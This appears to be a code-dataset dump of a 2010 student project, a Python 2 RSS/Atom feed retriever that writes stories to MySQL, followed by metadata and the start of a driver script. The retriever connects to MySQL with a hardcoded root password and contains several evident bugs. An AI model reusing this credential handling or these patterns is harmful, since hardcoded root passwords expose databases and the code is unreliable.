unicodedata.normalize('NFKD', feedtitle).encode('ascii','ignore')\n\t\tfeedtitle = feedtitle[:240]\n\tprint 'Feed Title:' , feedtitle\n\n\tprint 'LC DEBUG LATEST_TS IN ATOM', str(latest_ts)\n\t# write all entries parsed on local file\n\tfor count in range(n_entries):\n\t\t# check time_stamp of the entry before proceeding\n\t\t# to avoid processing something we will trash!\n\t\t# convert Universal Feed Parser generated time (tuple) into UNIX time\n\t\tUNIX_time = 0\n\t\tif myfeed.entries[count].has_key('updated'):\n\t\t\tdate_parsed = myfeed.entries[count].updated_parsed\n\t\t\tUNIX_time = int(time.mktime(date_parsed))\n\t\telif myfeed.entries[count].has_key('published'):\n\t\t\tdate_parsed = myfeed.entries[count].published_parsed\n\t\t\tUNIX_time = int(time.mktime(date_parsed))\n\n\n\t\tif ((UNIX_time == 0) or (UNIX_time > latest_ts)):\n\t\t\tif (debug):\n\t\t\t\tf.write('Entry ' + str(count+1) + ' Information:\\n')\n\t\t\t\tf.write('Feed Title: ' + feedtitle + '\\n')\n\t\t\t# get entry title\n\t\t\tentrytitle = 'Undefined'\n\t\t\tif myfeed.entries[count].has_key('title'):\n\t\t\t\tentrytitle = myfeed.entries[count].title\n\t\t\t\tentrytitle = unicodedata.normalize('NFKD', entrytitle).encode('ascii','ignore')\n\t\t\t\tif (debug):\n\t\t\t\t\tf.write('Entry Title: '+ entrytitle + '\\n')\n\t\t\telse:\n\t\t\t\tif (debug):\n\t\t\t\t\tf.write('Entry Title: Undefined' + '\\n')\n\t\t\t\tlog.write('Entry ' + str(count+1) + ' error: Entry title = Undefined\\n')\n\n\t\t\tentrytitle_list.append(entrytitle)\n\n\t\t\t# ---------- Retrieve content info ------------\n\t\t\tpos = 0\n\t\t\t# intialize content variable to empty string (very useful)\n\t\t\tcontent = ''\n\n\t\t\t# get content from description field first, if possible\n\t\t\tcontent = myfeed.entries[count].description\n\n\t\t\t# if the content is empty, try to get in content field (atom specific)\n\t\t\tif content == '':\n\t\t\t\t# when entries[count] has content, get the content out\n\t\t\t\tif myfeed.entries[count].has_key('content'):\n\t\t\t\t\tfor content_index in range(len(myfeed.entries[count].content)):\n\t\t\t\t\t\tcontent = myfeed.entries[count].content[content_index].value\n\t\t\t\t\t\tif len(content) != 0:\n\t\t\t\t\t\t\tbreak\n\n\t\t\t# when content field also empty string, we cannot do anything more\n\t\t\tif content == '':\n\t\t\t\tlog.write('Entry ' + str(count+1) + ' error: Content is empty\\n')\n\t\t\telse:\n\t\t\t\t# ---------- Process content (clear out HTML codes) ---------------\n\t\t\t\tif (False):\n\t\t\t\t\tcontent = _ContentCutterD(content)\n\t\t\t\telse:\n\t\t\t\t\tcontent = _ContentCutter(content) # this is original required\n\n\t\t\tcontent = unicodedata.normalize('NFKD', content).encode('ascii','ignore')\n\t\t\tif (debug):\n\t\t\t\tf.write('Content: ' + content + '\\n')\n\n\n\t\t\t# get entry URL (ID first, before LINK)\n\t\t\t# this order seems more correct in ATOM feeds\n\t\t\tentryURL = ''\n\t\t\tif (myfeed.entries[count].has_key('id') and (len(myfeed.entries[count].id) != 0)):\n\t\t\t\tentryURL = myfeed.entries[count].id\n\t\t\t\tentryURL = unicodedata.normalize('NFKD', entryURL).encode('ascii','ignore')\n\t\t\telif (myfeed.entries[count].has_key('link') and (len(myfeed.entries[count].link) != 0)):\n\t\t\t\tentryURL = myfeed.entries[count].link\n\t\t\t\tentryURL = unicodedata.normalize('NFKD', entryURL).encode('ascii','ignore')\n\t\t\telse:\n\t\t\t\tentryURL = 'localhost'\n\t\t\t\tlog.write('Entry ' + str(count+1) + ' error: entryURL = localhost\\n')\n\n\t\t\tif (debug):\n\t\t\t\tf.write('Entry URL: ' + entryURL + '\\n')\n\n\t\t\tentryURL_list.append(entryURL)\n\n\t\t\t# write date of entries\n\t\t\tif (debug):\n\t\t\t\tf.write('Time Stamp: ' + str(UNIX_time) + '\\n')\n\t\t\t\tf.write('Time Stamp GMT DEBUG: ' + str(date_parsed[0]) + '/' + str(date_parsed[1]) + '/' + \\\n\t\t\t\tstr(date_parsed[2]) + ' ' + str(date_parsed[3]) + ':' + str(date_parsed[4]) + '\\n\\n')\n\n\t\t\tif (UNIX_time == 0):\n\t\t\t\tif (debug):\n\t\t\t\t\tf.write('Time Stamp: 0\\n\\n')\n\t\t\t\tlog.write('Entry ' + str(count+1) + ' error: Time Stamp = 0\\n')\n\n\t\t\tentry_ts_list.append(UNIX_time)\n\n\t\t\t# make a story from above parsed content\n\t\t\t# story is [Feed Title, Feed URL, [Entry Titles], [Entry Contents], [Entry Categories], [Entry URLs], [Entry Timestamps]]\n\t\t\tif content == '':\n\t\t\t\tcontent = 'Feed brought to you by the Watercooler'\n\t\t\tentrycontent_list.append(content)\n\t\t\tentrycategory_list.append('Undefined')\n\t# end for ---------------------------------------------------------------------------------------------------------\n\tif (len(entry_ts_list) > 0):\n\t\tstory = [feedtitle, feedurl, entrytitle_list, entrycontent_list, entrycategory_list, entryURL_list, entry_ts_list]\n\n\t# CONSISTENCY CHECK\n\tcon1 = len(entrytitle_list)\n\tcon2 = len(entrycontent_list)\n\tcon3 = len(entrycategory_list)\n\tcon4 = len(entryURL_list)\n\tcon5 = len(entry_ts_list)\n\tif ((con1 != con2) or (con1 != con3) or (con1 != con4) or (con1 != con5)):\n\t\tprint 'CONSISTENCY CHECK FAILED IN ATOM STORY '\n\t\tprint 'STORY IS:'\n\t\tprint str(story)\n\t\tprint '\\n'\n\n\treturn story\n\n\n# This is deprecated UpdateFeed, only useful to test output of ONE URL\n# THIS IS LOCAL TEST, NO modification to database is performed\ndef UpdateFeed_tester():\n\t# create object myfeed, which stores information of parsed CNN top stories RSS\n\t# WORKING Flawlessly:\n\t# nicely regular RSS feed, easy to process HTML codes (5.3 Verified)\n\tmyfeed_all = []\n\tmyfeed = feedparser.parse('cnn_topstories.rss')\n\tmyfeed_all.append(myfeed)\n\tmyfeed = feedparser.parse('cnn_world.rss')\n\tmyfeed_all.append(myfeed)\n\tmyfeed = feedparser.parse('ESPN_com.xml')\n\tmyfeed_all.append(myfeed)\n\tmyfeed = feedparser.parse('world.xml')\n\tmyfeed_all.append(myfeed)\n\t# myfeed = feedparser.parse('http://sports.espn.go.com/espn/rss/news')\n\n\t# atom feed, strangely formatted, but it is working (5.3 Verified)\n\tmyfeed = feedparser.parse('NYT_Home_Page.xml')\n\tmyfeed_all.append(myfeed)\n\n\t# RSS feed, contain empty entry, but it is required to retain them (it shows in real feed!)\n\tmyfeed = feedparser.parse('News_Toms_Hardware_US.xml')\n\tmyfeed_all.append(myfeed)\n\n\t# RSS feed, working, but contain some styles that may crash email server\n\tmyfeed = feedparser.parse('cnn_topstories_bug.rss')\n\tmyfeed_all.append(myfeed)\n\n\t# Most entries \"work\" in these, some \"not work\" is basically something we cannot do.\n\t# The ads contain legal ending syntax that we cannot differentiate them\n\t# consider email SPAM filtering. We are very conservative, ensuring correctness.\n\t# Possibility of performance issue, used 1 sec to process\n\t# if you want \"more working\" version, we can implement more aggressive filter\n\t# techniques, such as, disgard all information afterwards which is seperated by \n\t# 2 \\n in a row, regardless of whats the characters in front\n\t# NOTE THIS AGGRESSIVE METHOD WILL BREAK RSS WITH FORMATS, since they\n\t# appear to have many \\n after parsed and removed HTMLs\n\tmyfeed = feedparser.parse('cardriver_blog.xml')\n\tmyfeed_all.append(myfeed)\n\t\n\tmyfeed = feedparser.parse('invalidurl')\n\tmyfeed_all.append(myfeed)\n\n\tmyfeed = feedparser.parse('www.yahoo.com')\n\tmyfeed_all.append(myfeed)\n\n\tmyfeed = feedparser.parse('')\n\tmyfeed_all.append(myfeed)\n\n\t# NOT WORKING:\n\n\t# Possibility of performance issue, used 2 sec to process (over 300 entries)\n\t# some hyperlink ads remaining. We cannot do anything as those are \"near content\"\n\t# ads. We human are smart enough to comprehend the semantics!\n\t# some HTML code remains: &nbsp;\n\t# plan to remove it in the future\n\t# myfeed = feedparser.parse('http://www.rss-specifications.com/blog-feed.xml')\n\n\t# LC testing only\n\n\t# myfeed = feedparser.parse('http://feedparser.org/docs/examples/rss20.xml')\n\t# myfeed = feedparser.parse('http://feeds.feedburner.com/SlickdealsnetFP')\n\t# myfeed = feedparser.parse('http://rssfeeds.s3.amazonaws.com/goldbox')\n\t# myfeed = feedparser.parse('http://www.census.gov/mp/www/cpu/index.xml')\n\n\t# create a local temp file that store all parsed content for demostration purpose\n\t# firstly, check for feeds encoding and synchronize this information\n\tfilename_counter = 1\n\t#latest_ts = 1\n\t# May 21, 00:00 GMT\n\tlatest_ts = 1274400000\n\ttotal_stories = 0\n\tfor onefeed in myfeed_all:\n\t\tfilename = 'feed_test' + str(filename_counter) + '.txt'\n\t\tf = codecs.open(filename, encoding=onefeed.encoding, mode='w')\n\n\t\t# create a local log for indicating error\n\t\terrlog = open(\"ERRORLOG_testall.txt\", mode ='a')\n\n\t\t# display global feed information that shared across all entries\n\t\tprint 'Feed Encoding: ', onefeed.encoding\n\t\tprint 'Feed version (type): ', onefeed.version\n\n\t\t# run specified parser corresponding to type of feeds (RSS,atom,others)\n\t\tdebug = True\n\t\t#print '-----', type(onefeed.version)\n\t\t#if (onefeed.version is None):\n\t\t#\tprint 'LC CHECK DEBUG'\n\t\tif ((onefeed.version is not None) and (onefeed.has_key('version')) and (onefeed.version[:3] == \"rss\")):\n\t\t\tprint 'VERBOSE: RSS feed detected!'\n\t\t\tstories = _RSS(f, errlog, onefeed, latest_ts, debug)\n\t\telif ((onefeed.version is not None) and (onefeed.has_key('version')) and (onefeed.version[:4] == \"atom\")):\n\t\t\tprint 'VERBOSE: ATOM feed detected!'\n\t\t\tstories = _ATOM(f, errlog, onefeed, latest_ts, debug)\n\t\telse:\n\t\t\tstories = []\n\t\t\tprint 'UNKNOWN feed type! Probably invalid URL'\n\t\tfilename_counter = filename_counter + 1\n\t\ttotal_stories = total_stories + len(stories[5])\n\n\tf.close()\n\t# print stories\n\t# return stories\n\tprint 'Processed ', total_stories, ' stories!'\n\treturn\n\ndef UpdateFeed():\n\t# DEBUG FLAG, LC DEBUG\n\tdebug = False\n\t# create a local log for indicating error\n\terrlog = open(\"ERRORLOG.txt\", mode ='a')\n\t# print 'UPDATEFEED STARTED AT 997 \\n'\n\t# connect to the database\n\tconn = MySQLdb.connect (host = \"localhost\", user = \"root\", passwd = \"adminsql\", db = \"watercooler\")\n\n\t# Get last updated time: latest_ts\n\tcursor = conn.cursor ()\n\tcursor.execute (\"\"\"\n\t\tSELECT feed_sources.source_name, feed_stories.time_stamp\n\t\tFROM feed_stories, feed_sources, (SELECT feed_sources.sid AS source_id\n\t\t\t\t\t\tFROM feed_stories, feed_sources\n\t\t\t\t\t\tWHERE feed_stories.sid = feed_sources.sid\n\t\t\t\t\t\tGROUP BY feed_sources.sid\n\t\t\t\t\t\tHAVING MAX(time_stamp)) AS source_filter\n\t\tWHERE feed_stories.sid = feed_sources.sid\n\t\tAND feed_sources.sid = source_filter.source_id\n\t\tORDER BY feed_stories.time_stamp DESC;\n\t\t\"\"\")\n\n\ttimestamp_list = cursor.fetchall ()\n\t# first item is the latest time!\n\t###(myfeed.entries[count].has_key('updated')\t\n\tlatest_ts = 0\n\tif (len(timestamp_list) > 0):\n\t\tlatest_ts_tuple = timestamp_list[0]\n\t\tlatest_ts = latest_ts_tuple[1]\n\telse:\n\t\tprint ('TimeStamp POS Trapped 1, potential bug if not initial!')\n\t\tlatest_ts = 1\n\n\tcursor.close ()\n\n\n\t# get a list of URL, source_URLs\n\tcursor1 = conn.cursor ()\n\tcursor1.execute (\"\"\"\n\t\tSELECT DISTINCT source_name, source_url\n\t\tFROM feed_sources\n\t\tORDER BY source_name;\n\t\t\"\"\")\n\tsources_list = cursor1.fetchall ()\n\tif (len(sources_list) == 0):\n\t\tprint ('INVALID SOURCE URL LIST, refer to log file!')\n\t\terrlog.write ('INVALID SOURCE URL LIST: LENGTH 0\\n')\n\t\tcursor1.close ()\n\t\tconn.close ()\n\t\treturn []\n\n\tsource_URLs = []\n\tfor source_item in sources_list:\n\t\tsource_item_url = source_item[1]\n\t\tsource_URLs.append(source_item_url)\n\n\tcursor1.close ()\n\n\n\t# for each URL in the URL list, parse things.....\n\tfilename_counter = 0\n\tall_stories = []\n\n\tfor source_URL in source_URLs:\n\t\tmyfeed = feedparser.parse(source_URL)\n\n\t\t# get feed title and update feed title to database, if not null\n\t\t# we first get feed sid by URL, then update the title with sid\n\t\tsource_feed_title = 'Undefined'\n\t\tif ((myfeed is not None) and (myfeed.feed is not None) and (myfeed.feed.has_key('title'))):\n\t\t\tsource_feed_title = myfeed.feed.title\n\t\t\tsource_feed_title = unicodedata.normalize('NFKD', source_feed_title).encode('ascii','ignore')\n\t\t\tsource_feed_title = source_feed_title[:240]\n\t\t\tif (len(source_feed_title) > 0):\n\t\t\t\tcursor_title = conn.cursor ()\n\t\t\t\tcursor_title.execute (\"\"\"\n SELECT sid\n FROM feed_sources\n\t\t\t\t\t\tWHERE source_url = (%s);\n \"\"\", (source_URL))\n\t\t\t\tfeed_sid_tuple = cursor_title.fetchone ()\n\t\t\t\tif (len(feed_sid_tuple) > 0):\n\t\t\t\t\tfeed_sid = feed_sid_tuple[0]\n\t\t\t\t\tcursor_update_title = conn.cursor ()\n\t\t\t\t\tcursor_update_title.execute (\"\"\"\n\t\t\t\t\t\t\tUPDATE feed_sources\n\t\t\t\t\t\t\tSET source_name = (%s)\n\t\t\t\t\t\t\tWHERE sid = (%s);\n\t\t\t\t\t\t\t\"\"\", (source_feed_title, feed_sid))\n\n\t\t\t\t\tcursor_update_title.close ()\n\t\t\t\tcursor_title.close ()\n\t\t\t\tif (len(feed_sid_tuple) > 0):\n\t\t\t\t\tconn.commit ()\n\t\t\telse:\n\t\t\t\tprint 'NULL feed title detected, cannot update database for URL: ' , source_URL, '\\n'\n\t\t\t\terrlog.write('NULL feed title detected, cannot update database for URL: ', source_URL, '\\n')\n\n\n\t\t# create a local temp file that store all parsed content for demostration purpose\n\t\t# firstly, check for feeds encoding and synchronize this information\n\t\t# f = open(\"feeds.txt\", \"w\")\n\n\t\tif (debug):\n\t\t\tfilename = 'feed' + str(filename_counter) + '.txt'\n\t\t\tf = codecs.open(filename, encoding=myfeed.encoding, mode='a')\n\t\telse:\n\t\t\tf = codecs.open('placeholder_feed.txt', encoding=myfeed.encoding, mode='a')\n\n\t\tif (debug):\n\t\t\t# display global feed information that shared across all entries\n\t\t\tprint 'Feed Encoding: ', myfeed.encoding\n\t\t\tprint 'Feed version (type): ', myfeed.version\n\n\t\t# run specified parser corresponding to type of feeds (RSS,atom,others)\n\t\tif ((myfeed.version is not None) and (myfeed.has_key('version')) and (myfeed.version[:3] == \"rss\")):\n\t\t\tif (debug):\n\t\t\t\tprint 'VERBOSE: RSS feed detected!'\n\t\t\tstories = []\n\t\t\tstories = _RSS(f, errlog, myfeed, latest_ts, source_URL, debug)\n\t\t\t\n\t\telif ((myfeed.version is not None) and (myfeed.has_key('version')) and (myfeed.version[:4] == \"atom\")):\n\t\t\tif (debug):\n\t\t\t\tprint 'VERBOSE: ATOM feed detected!'\n\t\t\tstories = []\n\t\t\tstories = _ATOM(f, errlog, myfeed, latest_ts, source_URL, debug)\n\n\t\telse:\n\t\t\tif (debug):\n\t\t\t\tprint 'UNKNOWN feed type! Probably invalid URL'\n\t\t\tstories = []\n\n\t\tf.close()\n\t\t#print 'LC DEBUG 1125, STORY:'\n\t\t#print str(stories)\n\t\t#print '\\n'\n\t\tall_stories.append(stories)\n\t\tfilename_counter = filename_counter + 1\n\n\t# now i have a big list of stories: all_stories (list of many story)\n\t# story is [Feed Title, Entry Title, Entry Content, Entry Category, Entry URL, Entry Timestamp]\n\n\t# Process the List List:\n\t# \tComparing the time stamp of each story with \"newest\" time stamp obtained\n\t# \tremove all old story\n\tprocessed_stories = []\n\t\"\"\"\n\tfor r_story in all_stories:\n\t\tr_story_ts = r_story[5]\n\t\tif (r_story_ts > latest_ts):\n\t\t\tprocessed_stories.append(r_story)\n\t\"\"\"\n\t# now I have a processed list of stories as processed_stories\n\t# get list of IDs... sources_id_list\n\tcursor2 = conn.cursor ()\n\tcursor2.execute (\"\"\"\n SELECT DISTINCT sid, source_url\n FROM feed_sources\n ORDER BY sid;\n \"\"\")\n\tsources_id_list = cursor2.fetchall ()\n\n\t# story is [Feed Title, Feed URL, [Entry Titles], [Entry Contents], [Entry Categories], [Entry URLs], [Entry Timestamps]]\n\tcursor3 = conn.cursor ()\n\tcursor_chkexist = conn.cursor ()\n\n\t\"\"\"\n\t# LC DEBUG: DISPLAY ALL PROCESSED_STORIES\n\tdebug_counter0 = 0\n\tfor p_story in processed_stories:\n\t\tdebug_counter = 0\n\t\tfor item in p_story:\n\t\t\tprint 'STORY ', debug_counter0, 'Field ' , debug_counter, ': ', item\n\t\t\tdebug_counter = debug_counter + 1\n\t\tdebug_counter0 = debug_counter0 + 1\n\t\"\"\"\n\t#print 'LC DEBUG 1170, ALL STORIES '\n\t#print str(all_stories)\n\t#print '\\n'\n\t#print 'LC DEBUG 1171, LENGTH ', str(len(all_stories))\n\t#print '\\n'\n\tfor p_story in all_stories:\n\t\t# holdings var for each p_story...\n\t\tlist_title = []\n\t\tlist_content = []\n\t\tlist_category = []\n\t\tlist_URL = []\n\t\tlist_ts = []\n\t\t#print 'LC CHECK 1 ARRIVAL, PER STORY START' # LC DEBUG\n\t\t# loop to check against feed URL\n\t\t#print 'LC DEBUG 1176, P_STORY '\n\t\t#print str(p_story)\n\t\t#print '\\n'\n\t\t#sys.stdout.flush()\n\t\tmysid = 0\n\t\tif (len(p_story) > 0):\n\t\t\tfor id_list in sources_id_list:\n\t\t\t\tif (id_list[1][:240] == p_story[1][:240]):\n\t\t\t\t\tmysid = id_list[0] \n\t\t\t\t\tbreak\n\t\t\tif (mysid == 0):\n\t\t\t\tprint ('INVALID SID!, refer to log file! \\n')\n\t\t\t\terrlog.write ('INVALID SID: Processed STORY\\n')\n\t\t\t\terrlog.write(' FEED ENTRY TITLE IS:')\n\t\t\t\terrlog.write(p_story[1])\n\t\t\t\terrlog.write('\\n')\n\t\t\t\tcursor_chkexist.close ()\n\t\t\t\tcursor2.close()\n\t\t\t\tcursor3.close()\n\t\t\t\tconn.commit()\n\t\t\t\tconn.close()\n\t\t\t\treturn []\n\t\t\t# for each entry in the story...\n\t\t\tfor iteration in (range(len(p_story[6]))):\n\t\t\t\t# check existence of entry\n\t\t\t\tcursor_chkexist.execute(\"\"\"\n\t\t\t\t\tSELECT fid\n\t\t\t\t\tFROM feed_stories\n\t\t\t\t\tWHERE feed_stories.url = (%s);\n\t\t\t\t\t\"\"\", p_story[5][iteration][:240])\n\t\t\t\tentry_existence = cursor_chkexist.fetchall ()\n\n\t\t\t\t# story exist implies the len check > 0\n\t\t\t\tif (len(entry_existence) > 0):\n\t\t\t\t\t# check again if the content match\n\t\t\t\t\tcursor_getstory = conn.cursor ()\n\t\t\t\t\tcursor_getstory.execute (\"\"\"\n\t\t\t\t\t\t\t\tSELECT content\n\t\t\t\t\t\t\t\tFROM feed_stories\n\t\t\t\t\t\t\t\tWHERE feed_stories.url = (%s);\n\t\t\t\t\t\t\t\t\"\"\", p_story[5][iteration][:240])\n\t\t\t\t\tdb_story = cursor_getstory.fetchall ()\n\t\t\t\t\tcursor_getstory.close ()\n\t\t\t\t\tif (len(db_story) == 0):\n\t\t\t\t\t\tprint 'DEBUG 1093, db_story IS NULL:', db_story\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint 'HERE IS db_story RETURNED: ', db_story\n\n\t\t\t\t\t# safety check\n\t\t\t\t\tif (len(db_story) == 0):\n\t\t\t\t\t\tprint 'DEBUG 1099, db_story is NULL when it should not be'\n\t\t\t\t\telse:\n\t\t\t\t\t\tif (len(db_story[0]) == 0):\n\t\t\t\t\t\t\tprint 'DEBUG 1102, db_story[0] is NULL when it should not be'\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif (db_story[0][0][:240] != p_story[3][iteration][:240]):\n\t\t\t\t\t\t\t\t# add the entry to the list, as content does not match\n\t\t\t\t\t\t\t\tlist_title.append(p_story[2][iteration][:240])\n\t\t\t\t\t\t\t\tlist_content.append(p_story[3][iteration][:240])\n\t\t\t\t\t\t\t\tlist_category.append(p_story[4][iteration][:240])\n\t\t\t\t\t\t\t\tlist_URL.append(p_story[5][iteration][:240])\n\t\t\t\t\t\t\t\tlist_ts.append(p_story[6][iteration])\n\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tprint 'DUPLICATE ENTRY DETECTED, CONTENT MATCHES'\n\t\t\t\t\t\t\t# delete that entry\n\t\t\t\t\t\t\tcursor_deletestory = conn.cursor ()\n\t\t\t\t\t\t\tcursor_deletestory.execute (\"\"\"\n\t\t\t\t\t\t\t\tDELETE FROM feed_stories\n\t\t\t\t\t\t\t\tWHERE feed_stories.url = (%s);\n\t\t\t\t\t\t\t\t\"\"\", p_story[5][iteration][:240])\n\t\t\t\t\t\t\tcursor_deletestory.close ()\n\t\t\t\t\t\t\tprint 'HERE I REPLACE TO DB: ----------------'\n\t\t\t\telse:\n\t\t\t\t\t# implies entry does not exist, add to list\n\t\t\t\t\tlist_title.append(p_story[2][iteration][:240])\n\t\t\t\t\tlist_content.append(p_story[3][iteration][:240])\n\t\t\t\t\tlist_category.append(p_story[4][iteration][:240])\n\t\t\t\t\tlist_URL.append(p_story[5][iteration][:240])\n\t\t\t\t\tlist_ts.append(p_story[6][iteration])\n\n\t\t\t\t\tprint 'HERE I ADD TO DB: ----------------'\n\n\t\t\t\t# Add entry to DB\n\t\t\t\tprint p_story[2][iteration][:240], ' ||| ' , p_story[3][iteration][:240], ' ||| ' , p_story[5][iteration][:240], ' ||| ' , str(p_story[6][iteration])\n\t\t\t\tprint '-------------------------------------'\n\t\t\t\tcursor3.execute (\"\"\"\n\t\t\t\t\tINSERT INTO feed_stories (title, content, url, time_stamp, sid, gid)\n\t\t\t\t\tVALUES (%s, %s, %s, %s, %s, %s)\n\t\t\t\t\tON DUPLICATE KEY UPDATE fid=fid+1;\n\t\t\t\t\t\"\"\", (p_story[2][iteration][:240], p_story[3][iteration][:240], p_story[5][iteration][:240], int(p_story[6][iteration]), mysid, 1))\n\t\t\t\tsys.stdout.flush()\n\n\t\t\t# make a final story out of the lists\n\t\t\tprocessed_story = []\n\t\t\t# CONSISTENCY CHECK\n\t\t\tcon1 = len(list_title)\n\t\t\tcon2 = len(list_content)\n\t\t\tcon3 = len(list_category)\n\t\t\tcon4 = len(list_URL)\n\t\t\tcon5 = len(list_ts)\n\t\t\tif ((con1 != con2) or (con1 != con3) or (con1 != con4) or (con1 != con5)):\n\t\t\t\tprint 'CONSISTENCY CHECK FAILED IN ATOM STORY '\n\t\t\t\tprint 'STORY IS:'\n\t\t\t\tprint str(story)\n\t\t\t\tprint '\\n'\n\t\t\tif (len(list_ts) > 0):\n\t\t\t\tprocessed_story = [p_story[0][:240], p_story[1][:240], list_title, list_content, list_category, list_URL, list_ts]\n\t\t\t\tprocessed_stories.append(processed_story)\n\n\tcursor_chkexist.close ()\n\tcursor3.close ()\n\tcursor2.close ()\n\tconn.commit ()\n\tconn.close ()\n\t\t\n\t# return processed stories list\n\t# LC DEBUG\n\t# print processed_stories\n\treturn processed_stories\n\nif __name__ == \"__main__\":\n\tUpdateFeed()\n\n\n# Copyright information\n\"\"\"\nAuthors: CS 130 Watercooler Content Distribution Engine Team\nCopyright (c) 2010, CS 130 Watercooler Content Distribution Engine Team\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice,\n this list of conditions and the following disclaimer.\n* Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 'AS IS'\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\nLIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\nCONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\nSUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\nINTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\nCONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\nARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\nPOSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\"\"\"\nfeedparser module (Universal Feed Parser)\nCopyright (c) 2002-2005, Mark Pilgrim\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice,\n this list of conditions and the following disclaimer.\n* Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 'AS IS'\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\nLIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\nCONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\nSUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\nINTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\nCONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\nARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\nPOSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n" }, { "alpha_fraction": 0.618354320526123, "alphanum_fraction": 0.6300463080406189, "avg_line_length": 30.625898361206055, "blob_id": "09c1a76bc471ed11fdd08eae0ed69a772bd6b8dd", "content_id": "fba17d77ca8d7d627c1d460a6f6a2ba0f928de52", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4533, "license_type": "no_license", "max_line_length": 104, "num_lines": 139, "path": "/driverfork.py", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.6\r\n\"\"\"\r\nVersion LOG\r\n\r\n1.0:\r\nJust a basic version including feed retriever\r\n\r\n2.0:\r\nA Looping functional driver \r\n\r\n2.1:\r\nAdding driver log to facilitate debug\r\n\r\n2.2:\r\nAdded more debug output\r\n\r\n\"\"\"\r\nglobal debug\r\ndebug = False\r\nlogs = True\r\nimport FeedRetriever\r\nimport EmailServer\r\nimport time\r\n\r\ndef Driver():\r\n\t# a driver to debug\r\n\tif (logs):\r\n\t\tdriverlog = open(\"DRIVERLOG.txt\", mode ='w')\r\n\t\tstorylog = open(\"STORYLOG.txt\", mode ='w')\r\n\r\n\t# a loop to call all backend functions\r\n\twhile (True):\r\n\t\t# gather new feeds entries\r\n\t\tstories = FeedRetriever.UpdateFeed()\r\n\r\n\t\t\"\"\" DEPRECATED WITH NEW DEFINITION\r\n\t\tif (debug):\r\n\t\t\t# current debug/testing purpose\r\n\t\t\tprint 'story is [Feed Title, Entry Title, Entry Content, Entry Category, Entry URL, Entry Timestamp]'\r\n\t\t\tfor index, story in enumerate(stories):\r\n\t\t\t\tprint 'Story', index, ':'\r\n\t\t\t\tfor item in range(len(story)):\r\n\t\t\t\t\tif (item <= 4):\r\n\t\t\t\t\t\tif ((item == 2) and (len(story[item]) > 100)):\r\n\t\t\t\t\t\t\tprint 'Item', item , ':', story[item][:100], '...'\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tprint 'Item', item , ':', story[item]\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tprint 'Item', item , ':', story[item]\r\n\t\t\t\tprint ''\r\n\t\t\"\"\"\r\n\t\tif (logs):\r\n\t\t\tstorylog.write(str(stories))\r\n\t\t\tstorylog.write('\\n\\n')\r\n\t\t# for testing, only get first four stories, and trim the \r\n\t\tcutted_stories = []\r\n\t\tlimiter = 0\r\n\t\tfor story in stories:\r\n\t\t\tif limiter < 1000:\r\n\t\t\t\tcutted_story = []\r\n\t\t\t\tcutted_story.append(story[1])\r\n\t\t\t\tcutted_story.append(story[5])\r\n\t\t\t\tcutted_story.append(story[2])\r\n\t\t\t\tcutted_story.append(story[3])\r\n\t\t\t\tcutted_stories.append(cutted_story)\r\n\t\t\t\tlimiter = limiter + 1\r\n\t\t\tif ((limiter % 10) == 0):\r\n\t\t\t\t# call tim's function\r\n\t\t\t\t# special code to delay Tim's code to avoid bombing, to facilitate testing\r\n\t\t\t\tprint ' -------------------------------------- '\r\n\t\t\t\tprint 'Here is 10 story passed to email server'\r\n\t\t\t\tprint ' -------------------------------------- '\r\n\t\t\t\tif (logs):\r\n\t\t\t\t\tdriverlog.write('--------------------------------------\\n')\r\n\t\t\t\t\tdriverlog.write('Here is 10 story passed to email 